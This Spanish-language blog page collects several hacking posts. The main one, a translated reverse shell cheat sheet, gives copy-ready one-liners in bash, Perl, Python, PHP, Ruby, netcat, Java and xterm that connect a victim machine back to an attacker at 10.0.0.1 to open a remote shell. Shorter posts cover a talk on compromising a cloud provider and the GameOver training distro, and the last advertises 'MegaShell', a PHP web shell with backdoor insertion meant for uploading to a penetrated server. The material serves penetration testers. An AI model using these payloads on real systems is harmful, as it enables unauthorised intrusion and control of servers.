Reverse Shell Cheat Sheet

Si tenés la suerte de encontrar una vulnerabilidad de ejecución de comandos durante un test de penetración probablemente quieras usar una consola interactiva.

Si no es posible añadir una nueva cuenta, clave SSH o fichero .rhosts y directamente loguearse, el siguiente paso será lanzar una shell reversa o dejar una shell escuchando en un puerto. En este post se verá el primer caso.

Las opciones para crear una shell reversa están limitadas por los lenguajes de scripting instalados en la máquina de la víctima (aunque tambien se podría subir un binario si uno está bien preparado).

Los ejempos a continuación funcionan para sistemas Unix-like. Algunos podrían funcionar también en Windows si se usa «cmd.exe» en vez de «/bin/sh -i».

Cada uno de los métodos siguientes están pensados para ser de una línea para que se puedan copiar fácil, por lo tanto no son muy legibles.

Bash

Algunas versiones de bash pueden usarse como shell reversa (probado en Ubuntu 10.10):

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

PERL

Esta es una versión más corta y minimalista de perl-reverse-shell:

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

También existe una alternativa en PERL en este enlace.

Python

Probado en  GNU/Linux con Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

El código asume que estás usando el descriptor de ficheros número 3. Esto funcionó en mi sistema. Si no lo hace en el tuyo probá con los descriptores 4,5,6…

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Si querés un fichero .php para subir podés usar php-reverse-shell que es más poderoso y robusto.

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

Netcat no suele estar presente en sistemas en producción y aún si lo hace hay que tener en cuenta que algunas versiones no soportan la opción -e.

nc -e /bin/sh 10.0.0.1 1234

Si tenés la versión incorrecta de netcat, Jeff Price points muestra en este enlace que también es posible conseguir una shell de esta forma:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

[Envío anónimo sin probar]

xterm

Una de las maneras más sencillas de obtener una shell reversa es vía una sesión de xterm. El comando a continuación se debe correr en la víctima. Este tratará de conectarse a tu máquina (10.0.0.1 en el puerto 6001).

xterm -display 10.0.0.1:1

Para obtener la shell en tu máquina necesitás iniciar un servidor X que escuche en el puerto 6001. Una de las formas de hacer esto es usando Xnest:

Xnest :1

Necesitarás autorizar a la víctima para que se conecte a tu equipo (también tiene que hacerse en este último):

xhost +targetip

Otras lecturas

Podés chequear Bernardo’s Reverse Shell One-Liners.  Tiene shells hechas de otra manera y la que hizo en ruby no usa /bin/sh para funcionar.

También existe una shell reversa escrita en gawk,  que viene instalado por defecto en muchas máquinas por lo que lo convierte en una excelente herramienta para pentesters.

Traducido de http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Saludos!

Hackeando la nube sin herramientas por Matias Katz

Excelente charla impartida por Matias Katz, consultor de seguridad de Mkit en el último FLISoL 2013 de la Universidad Tecnológica Nacional Regional Buenos Aires.

Matias muestra la realidad y la seguridad de muchos proveedores de Cloud Computing, por otro lado acompaña su conferencia contando el método y la forma que lograron comprometer completamente a un proveedor.

 

Gracias al blog Linux para Todos de Claudio Cotar por compartir la conferencia.

Fuente: http://www.caceriadespammers.com.ar/2013/05/hackeando-la-nube-sin-herramientas-por.html

Saludos!

GameOver: Distro para iniciar en el Hacking

Navegando, e investigando, me encontré con una distro llamada GameOver, está enfocada para la enseñanza de la seguridad web y el hacking.

Está disponible en modo LIVE, como decía antes es un proyecto iniciado con el objetivo de capacitar y educar a los novatos sobre los fundamentos de la seguridad web y educarlos acerca de los ataques web más comunes y ayudarles a entender su funcionamiento. GameOver esta dividido en dos secciones.

Sección 1 se compone de aplicaciones web diseñadas especialmente para enseñar los fundamentos de la seguridad Web.

incluye:

XSS
CSRF
RFI & LFI
BruteForce Authentication
Directory/Path traversal
Command execution
SQL injection
La Sección 2 es una colección de aplicaciones Web inseguras. Esta sección proporciona una plataforma legal para poner a prueba sus habilidades y tratar de explotar las vulnerabilidades, con el objetivo de mejorar sus habilidades en ataques reales.

Sin duda una herramienta muy útil que ayudará a desarrollar y/o mejorar las capacidades para test de penetración, de forma que tenga más experiencia en ataques reales.

Requisitos:

256 MB en RAM
Una USB botteable ó imagen .iso (recomendado)
a la hora de iniciar pedirá una contraseña y un usuario: [usuario: root / password: gameover]
una vez que se logueen, escriban ‘ifconfig’ en la línea de comandos y presionen enter,
esto les dará la dirección Ip de la Máquina de GameOver(Servidor)
Ahora en el navegador escriban ésta dirección
Ahora si estarán en GameOver

GameOver se basa en Voyage Linux, una distro minimalista basada en Debian

Web Applications (seccion 1):
Damn Vulneable Web Application: (http://www.dvwa.co.uk/)
OWASP WebGoat: (https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project)
Ghost (http://www.gh0s7.net/)
Mutillidae (http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10)
Zap-Wave: (http://code.google.com/p/zaproxy/)

Web Applications (section 2):
Owasp Hackademic Challenges : (https://www.owasp.org/index.php/OWASP_Hackademic_Challenges_Project)
Owasp Vicnum: (https://www.owasp.org/index.php/Category:OWASP_Vicnum_Project)
WackoPicko: (http://www.aldeid.com/wiki/WackoPicko)
Owasp Insecure Web App: (https://www.owasp.org/index.php/Category:OWASP_Insecure_Web_App_Project)
BodgeIT: (http://code.google.com/p/bodgeit/)
PuzzleMall: (https://code.google.com/p/puzzlemall/)
WAVSEP: (https://code.google.com/p/wavsep/)

Bugs conocidos; La iso no puede ser instalada en una máquina virtual, sólo funciona en modo Live

El autor de esta distro es Jovin Lobo

Para Descargarla sólo clickeen en el siguiente enlace:http://sourceforge.net/projects/null-gameover/files/
Para visitar la página del proyecto (Inglés), clickeen aquí:http://null.co.in/2012/06/14/gameover-web-pentest-learning-platform/
Hasta luego!
Gracias!!!

Fuente: http://www.taringa.net/posts/linux/15998523/GameOver_-Distro-para-iniciar-en-el-Hacking_.html

Saludos!

MegaShell PHP

Saludos!!!

Les presento una shell programada en PHP, ideal para subirla a un servidor penetrado.

Algunas de sus características son:

1. Sistema de login basado en usuario y contraseña, esta última codificada en MD5
2. Información de la máquina víctima
3. Explorador de archivos que permite mover, copiar, editar, borrar, crear, descargar y subir
4. Opción para ejecución de código BASH y PHP
5. Facil inserción de un backdoor programado en perl(dc.pl)
6. Administración de MySQL en el servidor víctima
7. Consta de un solo archivo en PHP, ideal para subirla fácilmente y no tener que subir gran cantidad de archivos, como pasa con otas shell

Descarga la versión 0.1